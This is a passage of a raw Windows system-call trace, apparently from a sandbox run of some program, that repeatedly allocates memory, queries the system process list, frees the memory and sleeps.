BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.317] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.337] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.344] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 